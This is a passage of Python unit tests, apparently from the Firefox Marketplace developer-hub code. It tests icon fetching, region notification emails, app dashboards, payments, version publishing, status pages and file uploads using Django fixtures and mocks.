tasks.fetch_manifest('url', self.upload.pk)
self.check_validation(
'Your manifest file was not encoded as valid UTF-8.')
class TestFetchIcon(BaseWebAppTest):
def setUp(self):
super(TestFetchIcon, self).setUp()
self.content_type = 'image/png'
self.apps_path = os.path.join(settings.ROOT, 'mkt', 'developers',
'tests', 'addons')
patcher = mock.patch('mkt.developers.tasks.requests.get')
self.requests_mock = patcher.start()
self.requests_mock.return_value = StringIO('mozballin')
self.addCleanup(patcher.stop)
def webapp_from_path(self, path):
self.upload = self.get_upload(abspath=path)
self.url = reverse('submit.app')
assert self.client.login(username='[email protected]',
password='password')
return self.post_addon()
def test_no_version(self):
app = Webapp()
eq_(tasks.fetch_icon(app), None)
def test_no_icons(self):
path = os.path.join(self.apps_path, 'noicon.webapp')
iconless_app = self.webapp_from_path(path)
tasks.fetch_icon(iconless_app)
assert not self.requests_mock.called
def test_bad_icons(self):
path = os.path.join(self.apps_path, 'badicon.webapp')
iconless_app = self.webapp_from_path(path)
tasks.fetch_icon(iconless_app)
assert not self.requests_mock.called
def check_icons(self, webapp):
manifest = webapp.get_manifest_json()
biggest = max([int(size) for size in manifest['icons']])
icon_dir = webapp.get_icon_dir()
for size in amo.ADDON_ICON_SIZES:
if not size <= biggest:
continue
icon_path = os.path.join(icon_dir, '%s-%s.png'
% (str(webapp.id), size))
with open(icon_path, 'r') as img:
checker = ImageCheck(img)
assert checker.is_image()
eq_(checker.img.size, (size, size))
def test_data_uri(self):
app_path = os.path.join(self.apps_path, 'dataicon.webapp')
webapp = self.webapp_from_path(app_path)
tasks.fetch_icon(webapp)
eq_(webapp.icon_type, self.content_type)
self.check_icons(webapp)
def test_hosted_icon(self):
app_path = os.path.join(self.apps_path, 'mozball.webapp')
webapp = self.webapp_from_path(app_path)
img_path = os.path.join(self.apps_path, 'mozball-128.png')
with open(img_path, 'r') as content:
tasks.save_icon(webapp, content.read())
eq_(webapp.icon_type, self.content_type)
self.check_icons(webapp)
@mock.patch('mkt.developers.tasks._fetch_content')
@mock.patch('mkt.developers.tasks.save_icon')
def test_cdn_icon(self, save, fetch):
response = mock.Mock()
response.read.return_value = ''
webapp = mock.Mock()
webapp.is_packaged = False
url = 'http://foo.com/bar'
webapp.get_manifest_json.return_value = {'icons': {'128': url}}
tasks.fetch_icon(webapp)
assert url in fetch.call_args[0][0]
@mock.patch('mkt.developers.tasks.SafeUnzip')
@mock.patch('mkt.developers.tasks.save_icon')
def test_packaged_icon(self, save, zip):
response = mock.Mock()
response.read.return_value = ''
zf = mock.Mock()
zip.return_value = zf
webapp = mock.Mock()
webapp.is_packaged = True
url = '/path/to/icon.png'
webapp.get_manifest_json.return_value = {'icons': {'128': url}}
tasks.fetch_icon(webapp)
assert url[1:] in zf.extract_path.call_args[0][0]
class TestRegionEmail(amo.tests.WebappTestCase):
@mock.patch.object(settings, 'SITE_URL', 'http://omg.org/')
def test_email_for_one_new_region(self):
tasks.region_email([self.app.id], [mkt.regions.BR])
msg = mail.outbox[0]
eq_(msg.subject, '%s: Brazil region added to the Firefox Marketplace'
% self.app.name)
eq_(msg.to, ['[email protected]'])
dev_url = ('http://omg.org/developers/app/something-something/'
'edit#details')
assert unicode(self.app.name) in msg.body
assert dev_url in msg.body
assert ' added a new ' in msg.body
assert ' for Brazil.' in msg.body
# TODO: Re-enable this when we bring back Unsubscribe (bug 802379).
#assert 'Unsubscribe' in msg.body
@mock.patch.object(settings, 'SITE_URL', 'http://omg.org/')
def test_email_for_two_new_regions(self):
tasks.region_email([self.app.id],
[mkt.regions.UK, mkt.regions.BR])
msg = mail.outbox[0]
eq_(msg.subject, '%s: New regions added to the Firefox Marketplace'
% self.app.name)
eq_(msg.to, ['[email protected]'])
dev_url = ('http://omg.org/developers/app/something-something/'
'edit#details')
assert unicode(self.app.name) in msg.body
assert dev_url in msg.body
assert ' added two new ' in msg.body
assert ': Brazil and United Kingdom.' in msg.body
# TODO: Re-enable this when we bring back Unsubscribe (bug 802379).
#assert 'Unsubscribe' in msg.body
@mock.patch.object(settings, 'SITE_URL', 'http://omg.org/')
def test_email_for_several_new_regions(self):
tasks.region_email([self.app.id],
[mkt.regions.UK, mkt.regions.US, mkt.regions.BR])
msg = mail.outbox[0]
eq_(msg.subject, '%s: New regions added to the Firefox Marketplace'
% self.app.name)
assert ' added a few new ' in msg.body
assert ': Brazil, United Kingdom, and United States.' in msg.body
class TestRegionExclude(amo.tests.WebappTestCase):
def test_exclude_no_apps(self):
tasks.region_exclude([], [])
eq_(AER.objects.count(), 0)
tasks.region_exclude([], [mkt.regions.UK])
eq_(AER.objects.count(), 0)
def test_exclude_no_regions(self):
tasks.region_exclude([self.app.id], [])
eq_(AER.objects.count(), 0)
def test_exclude_one_new_region(self):
tasks.region_exclude([self.app.id], [mkt.regions.UK])
excluded = list(AER.objects.filter(addon=self.app)
.values_list('region', flat=True))
eq_(excluded, [mkt.regions.UK.id])
def test_exclude_several_new_regions(self):
tasks.region_exclude([self.app.id], [mkt.regions.US, mkt.regions.UK])
excluded = sorted(AER.objects.filter(addon=self.app)
.values_list('region', flat=True))
eq_(excluded, sorted([mkt.regions.US.id, mkt.regions.UK.id]))
########NEW FILE########
__FILENAME__ = test_utils_
from django.core.files.storage import default_storage as storage
import amo.tests
from mkt.developers.utils import check_upload
class TestCheckUpload(amo.tests.TestCase, amo.tests.AMOPaths):
# TODO: increase coverage on check_upload.
def test_not_valid(self):
with self.assertRaises(ValueError):
check_upload([], 'graphic', 'image/jpg')
def test_valid(self):
with storage.open(self.preview_image()) as f:
errors, hash = check_upload(f, 'preview', 'image/png')
assert not errors
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
import datetime
import json
import os
import tempfile
from contextlib import contextmanager
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core.files.uploadedfile import SimpleUploadedFile
from django.core.urlresolvers import reverse
from django.test.client import RequestFactory
from django.test.utils import override_settings
import mock
from nose.plugins.attrib import attr
from nose.tools import eq_, ok_
from pyquery import PyQuery as pq
import amo
import amo.tests
import mkt
from addons.models import Addon, AddonDeviceType, AddonUpsell, AddonUser
from amo.helpers import absolutify
from amo.tests import (app_factory, assert_no_validation_errors,
version_factory)
from amo.tests.test_helpers import get_image_path
from amo.utils import urlparams
from files.models import File, FileUpload
from lib.iarc.utils import get_iarc_app_title
from mkt.constants import MAX_PACKAGED_APP_SIZE
from mkt.developers import tasks
from mkt.developers.views import (_filter_transactions, _get_transactions,
_ratings_success_msg, _submission_msgs,
content_ratings, content_ratings_edit)
from mkt.files.tests.test_models import UploadTest as BaseUploadTest
from mkt.site.fixtures import fixture
from mkt.submit.models import AppSubmissionChecklist
from mkt.webapps.models import ContentRating, Webapp
from mkt.prices.models import AddonPremium, Price
from stats.models import Contribution
from translations.models import Translation
from users.models import UserProfile
from versions.models import Version
class AppHubTest(amo.tests.TestCase):
fixtures = fixture('prices', 'webapp_337141') + ['base/users']
def setUp(self):
self.create_flag('allow-b2g-paid-submission')
self.url = reverse('mkt.developers.apps')
self.user = UserProfile.objects.get(username='31337')
assert self.client.login(username=self.user.email, password='password')
def clone_addon(self, num, addon_id=337141):
ids = []
for i in xrange(num):
addon = Addon.objects.get(id=addon_id)
new_addon = Addon.objects.create(type=addon.type,
status=addon.status, name='cloned-addon-%s-%s' % (addon_id, i))
AddonUser.objects.create(user=self.user, addon=new_addon)
ids.append(new_addon.id)
return ids
def get_app(self):
return Addon.objects.get(id=337141)
class TestHome(amo.tests.TestCase):
fixtures = ['base/users']
def setUp(self):
self.url = reverse('mkt.developers.apps')
def test_login_redirect(self):
r = self.client.get(self.url)
self.assertLoginRedirects(r, '/developers/submissions', 302)
def test_home_anonymous(self):
r = self.client.get(self.url, follow=True)
eq_(r.status_code, 200)
self.assertTemplateUsed(r, 'developers/login.html')
def test_home_authenticated(self):
assert self.client.login(username='[email protected]',
password='password')
r = self.client.get(self.url, follow=True)
eq_(r.status_code, 200)
self.assertTemplateUsed(r, 'developers/apps/dashboard.html')
class TestAppBreadcrumbs(AppHubTest):
def setUp(self):
super(TestAppBreadcrumbs, self).setUp()
def test_regular_breadcrumbs(self):
r = self.client.get(reverse('submit.app'), follow=True)
eq_(r.status_code, 200)
expected = [
('Home', reverse('home')),
('Developers', reverse('ecosystem.landing')),
('Submit App', None),
]
amo.tests.check_links(expected, pq(r.content)('#breadcrumbs li'))
def test_webapp_management_breadcrumbs(self):
webapp = Webapp.objects.get(id=337141)
AddonUser.objects.create(user=self.user, addon=webapp)
r = self.client.get(webapp.get_dev_url('edit'))
eq_(r.status_code, 200)
expected = [
('Home', reverse('home')),
('Developers', reverse('ecosystem.landing')),
('My Submissions', reverse('mkt.developers.apps')),
(unicode(webapp.name), None),
]
amo.tests.check_links(expected, pq(r.content)('#breadcrumbs li'))
class TestAppDashboard(AppHubTest):
def test_no_apps(self):
Addon.objects.all().delete()
r = self.client.get(self.url)
eq_(r.status_code, 200)
eq_(pq(r.content)('#dashboard .item').length, 0)
def make_mine(self):
AddonUser.objects.create(addon_id=337141, user=self.user)
def test_public_app(self):
app = self.get_app()
self.make_mine()
doc = pq(self.client.get(self.url).content)
item = doc('.item[data-addonid=%s]' % app.id)
assert item.find('.price'), 'Expected price'
assert item.find('.item-details'), 'Expected item details'
assert not item.find('p.incomplete'), (
'Unexpected message about incomplete add-on')
eq_(doc('.status-link').length, 1)
eq_(doc('.more-actions-popup').length, 0)
def test_incomplete_app(self):
app = self.get_app()
app.update(status=amo.STATUS_NULL)
self.make_mine()
doc = pq(self.client.get(self.url).content)
assert doc('.item[data-addonid=%s] p.incomplete' % app.id), (
'Expected message about incompleted add-on')
eq_(doc('.more-actions-popup').length, 0)
def test_packaged_version(self):
app = self.get_app()
version = Version.objects.create(addon=app, version='1.23')
app.update(_current_version=version, is_packaged=True)
self.make_mine()
doc = pq(self.client.get(self.url).content)
eq_(doc('.item[data-addonid=%s] .item-current-version' % app.id
).text(),
'Packaged App Version: 1.23')
@mock.patch('mkt.webapps.tasks.update_cached_manifests')
def test_pending_version(self, ucm):
ucm.return_value = True
app = self.get_app()
self.make_mine()
app.update(is_packaged=True)
Version.objects.create(addon=app, version='1.24')
doc = pq(self.client.get(self.url).content)
eq_(doc('.item[data-addonid=%s] .item-latest-version' % app.id
).text(),
'Pending Version: 1.24')
def test_action_links(self):
self.create_switch('iarc')
self.create_switch('comm-dashboard')
self.create_switch('view-transactions')
app = self.get_app()
app.update(public_stats=True, is_packaged=True,
premium_type=amo.ADDON_PREMIUM_INAPP)
self.make_mine()
doc = pq(self.client.get(self.url).content)
expected = [
('Edit Listing', app.get_dev_url()),
('Add New Version', app.get_dev_url('versions')),
('Status & Versions', app.get_dev_url('versions')),
('Content Ratings', app.get_dev_url('ratings')),
('Compatibility & Payments', app.get_dev_url('payments')),
('In-App Payments', app.get_dev_url('in_app_config')),
('Team Members', app.get_dev_url('owner')),
('View Listing', app.get_url_path()),
('Messages', app.get_comm_thread_url()),
('Statistics', app.get_stats_url()),
('Transactions', urlparams(
reverse('mkt.developers.transactions'), app=app.id)),
]
amo.tests.check_links(expected, doc('a.action-link'), verify=False)
class TestAppDashboardSorting(AppHubTest):
def setUp(self):
super(TestAppDashboardSorting, self).setUp()
self.my_apps = self.user.addons
self.url = reverse('mkt.developers.apps')
self.clone(3)
def clone(self, num=3):
for x in xrange(num):
app = amo.tests.addon_factory(type=amo.ADDON_WEBAPP)
AddonUser.objects.create(addon=app, user=self.user)
def test_pagination(self):
doc = pq(self.client.get(self.url).content)('#dashboard')
eq_(doc('.item').length, 4)
eq_(doc('#sorter').length, 1)
eq_(doc('.paginator').length, 0)
self.clone(7) # 4 + 7 = 11 (paginator appears for 11+ results)
doc = pq(self.client.get(self.url).content)('#dashboard')
eq_(doc('.item').length, 10)
eq_(doc('#sorter').length, 1)
eq_(doc('.paginator').length, 1)
doc = pq(self.client.get(self.url, dict(page=2)).content)('#dashboard')
eq_(doc('.item').length, 1)
eq_(doc('#sorter').length, 1)
eq_(doc('.paginator').length, 1)
def _test_listing_sort(self, sort, key=None, reverse=True,
sel_class='opt'):
r = self.client.get(self.url, dict(sort=sort))
eq_(r.status_code, 200)
sel = pq(r.content)('#sorter ul > li.selected')
eq_(sel.find('a').attr('class'), sel_class)
eq_(r.context['sorting'], sort)
a = list(r.context['addons'].object_list)
if key:
eq_(a, sorted(a, key=lambda x: getattr(x, key), reverse=reverse))
return a
def test_default_sort(self):
r = self.client.get(self.url)
eq_(r.status_code, 200)
eq_(r.context['sorting'], 'name')
r = self.client.get(self.url, dict(name='xxx'))
eq_(r.status_code, 200)
eq_(r.context['sorting'], 'name')
self._test_listing_sort('name', 'name', False)
def test_newest_sort(self):
self._test_listing_sort('created', 'created')
class TestDevRequired(AppHubTest):
def setUp(self):
self.webapp = Addon.objects.get(id=337141)
self.get_url = self.webapp.get_dev_url('payments')
self.post_url = self.webapp.get_dev_url('payments.disable')
self.user = UserProfile.objects.get(username='31337')
assert self.client.login(username=self.user.email, password='password')
self.au = AddonUser.objects.get(user=self.user, addon=self.webapp)
eq_(self.au.role, amo.AUTHOR_ROLE_OWNER)
self.make_price()
def test_anon(self):
self.client.logout()
r = self.client.get(self.get_url, follow=True)
login = reverse('users.login')
self.assertRedirects(r, '%s?to=%s' % (login, self.get_url))
def test_dev_get(self):
eq_(self.client.get(self.get_url).status_code, 200)
def test_dev_post(self):
self.assertRedirects(self.client.post(self.post_url), self.get_url)
def test_viewer_get(self):
self.au.role = amo.AUTHOR_ROLE_VIEWER
self.au.save()
eq_(self.client.get(self.get_url).status_code, 200)
def test_viewer_post(self):
self.au.role = amo.AUTHOR_ROLE_VIEWER
self.au.save()
eq_(self.client.post(self.get_url).status_code, 403)
def test_disabled_post_dev(self):
self.webapp.update(status=amo.STATUS_DISABLED)
eq_(self.client.post(self.get_url).status_code, 403)
def test_disabled_post_admin(self):
self.webapp.update(status=amo.STATUS_DISABLED)
assert self.client.login(username='[email protected]',
password='password')
self.assertRedirects(self.client.post(self.post_url), self.get_url)
@mock.patch('mkt.developers.forms_payments.PremiumForm.clean',
new=lambda x: x.cleaned_data)
class TestMarketplace(amo.tests.TestCase):
fixtures = fixture('prices', 'webapp_337141')
def setUp(self):
self.create_flag('allow-b2g-paid-submission')
self.addon = Addon.objects.get(id=337141)
self.addon.update(status=amo.STATUS_NOMINATED,
highest_status=amo.STATUS_NOMINATED)
self.url = self.addon.get_dev_url('payments')
assert self.client.login(username='[email protected]',
password='password')
def get_price_regions(self, price):
return sorted(set([p['region'] for p in price.prices() if p['paid']]))
def setup_premium(self):
self.price = Price.objects.get(pk=1)
self.price_two = Price.objects.get(pk=3)
self.other_addon = Addon.objects.create(type=amo.ADDON_WEBAPP,
premium_type=amo.ADDON_FREE)
self.other_addon.update(status=amo.STATUS_PUBLIC)
AddonUser.objects.create(addon=self.other_addon,
user=self.addon.authors.all()[0])
AddonPremium.objects.create(addon=self.addon, price_id=self.price.pk)
self.addon.update(premium_type=amo.ADDON_PREMIUM)
self.paid_regions = self.get_price_regions(self.price)
self.paid_regions_two = self.get_price_regions(self.price_two)
def get_data(self, **kw):
data = {
'form-TOTAL_FORMS': 0,
'form-INITIAL_FORMS': 0,
'form-MAX_NUM_FORMS': 0,
'price': self.price.pk,
'upsell_of': self.other_addon.pk,
'regions': mkt.regions.REGION_IDS,
}
data.update(kw)
return data
def test_initial_free(self):
AddonDeviceType.objects.create(
addon=self.addon, device_type=amo.DEVICE_GAIA.id)
res = self.client.get(self.url)
eq_(res.status_code, 200)
assert 'Change to Paid' in res.content
def test_initial_paid(self):
self.setup_premium()
res = self.client.get(self.url)
eq_(res.status_code, 200)
eq_(res.context['form'].initial['price'], self.price.pk)
assert 'Change to Free' in res.content
def test_set(self):
self.setup_premium()
res = self.client.post(
self.url, data=self.get_data(price=self.price_two.pk,
regions=self.paid_regions_two))
eq_(res.status_code, 302)
self.addon = Addon.objects.get(pk=self.addon.pk)
eq_(self.addon.addonpremium.price, self.price_two)
def test_set_upsell(self):
self.setup_premium()
res = self.client.post(self.url,
data=self.get_data(regions=self.paid_regions))
eq_(res.status_code, 302)
eq_(len(self.addon._upsell_to.all()), 1)
def test_remove_upsell(self):
self.setup_premium()
upsell = AddonUpsell.objects.create(
free=self.other_addon, premium=self.addon)
eq_(self.addon._upsell_to.all()[0], upsell)
self.client.post(self.url,
data=self.get_data(upsell_of='',
regions=self.paid_regions))
eq_(len(self.addon._upsell_to.all()), 0)
def test_replace_upsell(self):
self.setup_premium()
# Make this add-on an upsell of some free add-on.
upsell = AddonUpsell.objects.create(free=self.other_addon,
premium=self.addon)
# And this will become our new upsell, replacing the one above.
new = Addon.objects.create(type=amo.ADDON_WEBAPP,
premium_type=amo.ADDON_FREE,
status=amo.STATUS_PUBLIC)
AddonUser.objects.create(addon=new, user=self.addon.authors.all()[0])
eq_(self.addon._upsell_to.all()[0], upsell)
self.client.post(self.url, self.get_data(upsell_of=new.id,
regions=self.paid_regions))
upsell = self.addon._upsell_to.all()
eq_(len(upsell), 1)
eq_(upsell[0].free, new)
class TestPublicise(amo.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.create_switch('iarc')
self.webapp = self.get_webapp()
self.webapp.update(status=amo.STATUS_PUBLIC_WAITING)
self.file = self.webapp.versions.latest().all_files[0]
self.file.update(status=amo.STATUS_PUBLIC_WAITING)
self.publicise_url = self.webapp.get_dev_url('publicise')
self.status_url = self.webapp.get_dev_url('versions')
assert self.client.login(username='[email protected]',
password='password')
def get_webapp(self):
return Addon.objects.no_cache().get(id=337141)
def test_logout(self):
self.client.logout()
res = self.client.post(self.publicise_url)
eq_(res.status_code, 302)
eq_(self.get_webapp().status, amo.STATUS_PUBLIC_WAITING)
def test_publicise_get(self):
eq_(self.client.get(self.publicise_url).status_code, 405)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.tasks.index_webapps')
@mock.patch('mkt.webapps.tasks.update_cached_manifests')
@mock.patch('mkt.webapps.models.Webapp.update_supported_locales')
@mock.patch('mkt.webapps.models.Webapp.update_name_from_package_manifest')
def test_publicise(self, update_name, update_locales,
update_cached_manifests, index_webapps,
storefront_mock):
index_webapps.delay.reset_mock()
eq_(update_name.call_count, 0)
eq_(update_locales.call_count, 0)
eq_(update_cached_manifests.delay.call_count, 0)
eq_(storefront_mock.call_count, 0)
eq_(self.get_webapp().status, amo.STATUS_PUBLIC_WAITING)
res = self.client.post(self.publicise_url)
eq_(res.status_code, 302)
eq_(self.get_webapp().status, amo.STATUS_PUBLIC)
eq_(self.get_webapp().versions.latest().all_files[0].status,
amo.STATUS_PUBLIC)
eq_(update_name.call_count, 1)
eq_(update_locales.call_count, 1)
eq_(index_webapps.delay.call_count, 1)
# App is not packaged, no need to call update_cached_manifests.
eq_(update_cached_manifests.delay.call_count, 0)
eq_(storefront_mock.call_count, 1)
def test_status(self):
res = self.client.get(self.status_url)
eq_(res.status_code, 200)
doc = pq(res.content)
eq_(doc('#version-status form').attr('action'), self.publicise_url)
# TODO: fix this when jenkins can get the jinja helpers loaded in
# the correct order.
#eq_(len(doc('strong.status-waiting')), 1)
class TestPubliciseVersion(amo.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
Addon.objects.filter(pk=337141).update(is_packaged=True)
self.app = self.get_webapp()
self.url = self.app.get_dev_url('versions.publicise')
self.status_url = self.app.get_dev_url('versions')
assert self.client.login(username='[email protected]',
password='password')
def get_webapp(self):
return Addon.objects.no_cache().get(pk=337141)
def get_version_status(self):
v = Version.objects.no_cache().get(pk=self.app.latest_version.pk)
return v.all_files[0].status
def post(self, pk=None):
if not pk:
pk = self.app.latest_version.pk
return self.client.post(self.url, data={
'version_id': pk
})
def test_logout(self):
File.objects.filter(version__addon=self.app).update(
status=amo.STATUS_PUBLIC_WAITING)
self.client.logout()
res = self.post()
eq_(res.status_code, 302)
eq_(self.get_version_status(), amo.STATUS_PUBLIC_WAITING)
def test_publicise_get(self):
eq_(self.client.get(self.url).status_code, 405)
@mock.patch('mkt.webapps.tasks.index_webapps')
@mock.patch('mkt.webapps.tasks.update_cached_manifests')
@mock.patch('mkt.webapps.models.Webapp.update_supported_locales')
@mock.patch('mkt.webapps.models.Webapp.update_name_from_package_manifest')
def test_publicise_version_new_waiting(self, update_name, update_locales,
update_cached_manifests,
index_webapps):
""" Test publishing the latest, public_waiting version when the app is
already public, with a current version also already public """
eq_(self.app.status, amo.STATUS_PUBLIC)
ver = version_factory(addon=self.app, version='2.0',
file_kw=dict(status=amo.STATUS_PUBLIC_WAITING))
eq_(self.app.latest_version, ver)
ok_(self.app.current_version != ver)
index_webapps.delay.reset_mock()
eq_(update_name.call_count, 0)
eq_(update_locales.call_count, 0)
eq_(update_cached_manifests.delay.call_count, 0)
res = self.post()
eq_(res.status_code, 302)
eq_(self.get_version_status(), amo.STATUS_PUBLIC)
eq_(self.get_webapp().current_version, ver)
eq_(update_name.call_count, 1)
eq_(update_locales.call_count, 1)
eq_(update_cached_manifests.delay.call_count, 1)
@mock.patch('mkt.webapps.tasks.index_webapps')
@mock.patch('mkt.webapps.tasks.update_cached_manifests')
@mock.patch('mkt.webapps.models.Webapp.update_supported_locales')
@mock.patch('mkt.webapps.models.Webapp.update_name_from_package_manifest')
def test_publicise_version_cur_waiting_app_public(self, update_name,
update_locales,
update_cached_manifests,
index_webapps):
""" Test publishing when the app is in a weird state: public but with
only one version, which is public_waiting """
File.objects.filter(version__addon=self.app).update(
status=amo.STATUS_PUBLIC_WAITING)
eq_(self.app.current_version, self.app.latest_version)
eq_(self.app.status, amo.STATUS_PUBLIC)
index_webapps.delay.reset_mock()
eq_(update_name.call_count, 0)
eq_(update_locales.call_count, 0)
eq_(update_cached_manifests.delay.call_count, 0)
res = self.post()
eq_(res.status_code, 302)
eq_(self.app.current_version, self.app.latest_version)
eq_(self.get_version_status(), amo.STATUS_PUBLIC)
eq_(self.app.reload().status, amo.STATUS_PUBLIC)
eq_(update_name.call_count, 1)
eq_(update_locales.call_count, 1)
# only one version, update_version() won't change it, the mini-manifest
# doesn't need to be updated.
eq_(update_cached_manifests.delay.call_count, 0)
@mock.patch('mkt.webapps.tasks.index_webapps')
@mock.patch('mkt.webapps.tasks.update_cached_manifests')
@mock.patch('mkt.webapps.models.Webapp.update_supported_locales')
@mock.patch('mkt.webapps.models.Webapp.update_name_from_package_manifest')
def test_publicise_version_cur_waiting(self, update_name, update_locales,
update_cached_manifests,
index_webapps):
""" Test publishing when the only version of the app is waiting """
self.app.update(status=amo.STATUS_PUBLIC_WAITING)
File.objects.filter(version__addon=self.app).update(
status=amo.STATUS_PUBLIC_WAITING)
eq_(self.app.current_version, self.app.latest_version)
index_webapps.delay.reset_mock()
eq_(update_name.call_count, 0)
eq_(update_locales.call_count, 0)
eq_(update_cached_manifests.delay.call_count, 0)
res = self.post()
eq_(res.status_code, 302)
eq_(self.app.current_version, self.app.latest_version)
eq_(self.get_version_status(), amo.STATUS_PUBLIC)
eq_(self.app.reload().status, amo.STATUS_PUBLIC)
eq_(update_name.call_count, 1)
eq_(update_locales.call_count, 1)
# only one version, update_version() won't change it, the mini-manifest
# doesn't need to be updated.
eq_(update_cached_manifests.delay.call_count, 0)
@mock.patch('mkt.webapps.tasks.index_webapps')
@mock.patch('mkt.webapps.tasks.update_cached_manifests')
@mock.patch('mkt.webapps.models.Webapp.update_supported_locales')
@mock.patch('mkt.webapps.models.Webapp.update_name_from_package_manifest')
def test_publicise_version_pending(self, update_name, update_locales,
update_cached_manifests, index_webapps):
""" Test publishing a pending version """
version_factory(addon=self.app, version='2.0',
file_kw=dict(status=amo.STATUS_PENDING))
self.app.reload()
res = self.post()
eq_(res.status_code, 302)
eq_(self.get_version_status(), amo.STATUS_PENDING)
assert not update_name.called
assert not update_locales.called
def test_status(self):
File.objects.filter(version__addon=self.app).update(
status=amo.STATUS_PUBLIC_WAITING)
res = self.client.get(self.status_url)
eq_(res.status_code, 200)
doc = pq(res.content)
eq_(doc('#version-list form').attr('action'), self.url)
class TestStatus(amo.tests.TestCase):
fixtures = ['base/users'] + fixture('webapp_337141')
def setUp(self):
self.webapp = Addon.objects.get(id=337141)
self.file = self.webapp.versions.latest().all_files[0]
self.file.update(status=amo.STATUS_DISABLED)
self.status_url = self.webapp.get_dev_url('versions')
assert self.client.login(username='[email protected]',
password='password')
def test_status_when_packaged_public_dev(self):
self.webapp.update(is_packaged=True)
res = self.client.get(self.status_url)
eq_(res.status_code, 200)
doc = pq(res.content)
eq_(doc('#disable-addon').length, 1)
eq_(doc('#delete-addon').length, 1)
eq_(doc('#blocklist-app').length, 0)
def test_status_when_packaged_public_admin(self):
assert self.client.login(username='[email protected]',
password='password')
self.webapp.update(is_packaged=True)
res = self.client.get(self.status_url)
eq_(res.status_code, 200)
doc = pq(res.content)
eq_(doc('#disable-addon').length, 1)
eq_(doc('#delete-addon').length, 1)
eq_(doc('#blocklist-app').length, 1)
def test_status_when_packaged_rejected_dev(self):
self.webapp.update(is_packaged=True, status=amo.STATUS_REJECTED)
res = self.client.get(self.status_url)
eq_(res.status_code, 200)
doc = pq(res.content)
eq_(doc('#disable-addon').length, 1)
eq_(doc('#delete-addon').length, 1)
eq_(doc('#blocklist-app').length, 0)
def test_status_when_packaged_rejected_admin(self):
assert self.client.login(username='[email protected]',
password='password')
self.webapp.update(is_packaged=True, status=amo.STATUS_REJECTED)
res = self.client.get(self.status_url)
eq_(res.status_code, 200)
doc = pq(res.content)
eq_(doc('#disable-addon').length, 1)
eq_(doc('#delete-addon').length, 1)
eq_(doc('#blocklist-app').length, 0)
class TestDelete(amo.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.webapp = self.get_webapp()
self.url = self.webapp.get_dev_url('delete')
assert self.client.login(username='[email protected]',
password='password')
def get_webapp(self):
return Addon.objects.no_cache().get(id=337141)
def test_post(self):
r = self.client.post(self.url, follow=True)
eq_(pq(r.content)('.notification-box').text(), 'App deleted.')
self.assertRaises(Addon.DoesNotExist, self.get_webapp)
class TestResumeStep(amo.tests.TestCase):
fixtures = ['base/users'] + fixture('webapp_337141')
def setUp(self):
self.webapp = self.get_addon()
self.url = reverse('submit.app.resume', args=[self.webapp.app_slug])
assert self.client.login(username='[email protected]',
password='password')
def get_addon(self):
return Addon.objects.no_cache().get(pk=337141)
def test_no_step_redirect(self):
r = self.client.get(self.url, follow=True)
self.assertRedirects(r, self.webapp.get_dev_url('edit'), 302)
def test_step_redirects(self):
AppSubmissionChecklist.objects.create(addon=self.webapp,
terms=True, manifest=True)
r = self.client.get(self.url, follow=True)
self.assert3xx(r, reverse('submit.app.details',
args=[self.webapp.app_slug]))
def test_no_resume_when_done(self):
AppSubmissionChecklist.objects.create(addon=self.webapp,
terms=True, manifest=True,
details=True)
r = self.client.get(self.webapp.get_dev_url('edit'), follow=True)
eq_(r.status_code, 200)
def test_resume_without_checklist(self):
r = self.client.get(reverse('submit.app.details',
args=[self.webapp.app_slug]))
eq_(r.status_code, 200)
class TestUpload(BaseUploadTest):
fixtures = ['base/apps', 'base/users']
def setUp(self):
super(TestUpload, self).setUp()
assert self.client.login(username='[email protected]',
password='password')
self.package = self.packaged_app_path('mozball.zip')
self.url = reverse('mkt.developers.upload')
def post(self):
# Has to be a binary, non xpi file.
data = open(self.package, 'rb')
return self.client.post(self.url, {'upload': data})
def test_login_required(self):
self.client.logout()
r = self.post()
eq_(r.status_code, 302)
def test_create_fileupload(self):
self.post()
upload = FileUpload.objects.get(name='mozball.zip')
eq_(upload.name, 'mozball.zip')
data = open(self.package, 'rb').read()
eq_(storage.open(upload.path).read(), data)
def test_fileupload_user(self):
self.client.login(username='[email protected]', password='password')
self.post()
user = UserProfile.objects.get(email='[email protected]')
eq_(FileUpload.objects.get().user, user)
def test_fileupload_ascii_post(self):
path = self.packaged_app_path('mozball.zip')
data = storage.open(os.path.join(settings.ROOT, path))
replaced = path.replace('o', u'ö')
r = self.client.post(self.url, {'upload':
SimpleUploadedFile(replaced,
data.read())})
# If this is broken, we'll get a traceback.
eq_(r.status_code, 302)
@mock.patch('mkt.constants.MAX_PACKAGED_APP_SIZE', 1024)
@mock.patch('mkt.developers.tasks.validator')
def test_fileupload_too_big(self, validator):
with tempfile.NamedTemporaryFile(delete=False) as tf:
name = tf.name
tf.write('x' * (MAX_PACKAGED_APP_SIZE + 1))
with open(name) as tf:
r = self.client.post(self.url, {'upload': tf})
os.unlink(name)
assert not validator.called, 'Validator erroneously invoked'
# Test that we get back a validation failure for the upload.
upload = FileUpload.objects.get()
r = self.client.get(reverse('mkt.developers.upload_detail',
args=[upload.uuid, 'json']))
eq_(r.status_code, 200)
data = json.loads(r.content)
assert 'validation' in data, data
assert 'success' in data['validation'], data
assert not data['validation']['success'], data['validation']
@attr('validator')
def test_fileupload_validation(self):
self.post()
fu = FileUpload.objects.get(name='mozball.zip')
assert_no_validation_errors(fu)
assert fu.validation
validation = json.loads(fu.validation)
eq_(validation['success'], False)
eq_(validation['errors'], 0)
def test_redirect(self):
r = self.post()
upload = FileUpload.objects.get()
url = reverse('mkt.developers.upload_detail', args=[upload.pk, 'json'])
self.assertRedirects(r, url)
class TestUploadDetail(BaseUploadTest):
fixtures = ['base/apps', 'base/appversion', 'base/platforms', 'base/users']
def setUp(self):
super(TestUploadDetail, self).setUp()
assert self.client.login(username='[email protected]',
password='password')
def post(self):
# Has to be a binary, non xpi file.
data = open(get_image_path('animated.png'), 'rb')
return self.client.post(reverse('mkt.developers.upload'),
{'upload': data})
def validation_ok(self):
return {
'errors': 0,
'success': True,
'warnings': 0,
'notices': 0,
'message_tree': {},
'messages': [],
'rejected': False,
'metadata': {}}
def upload_file(self, name):
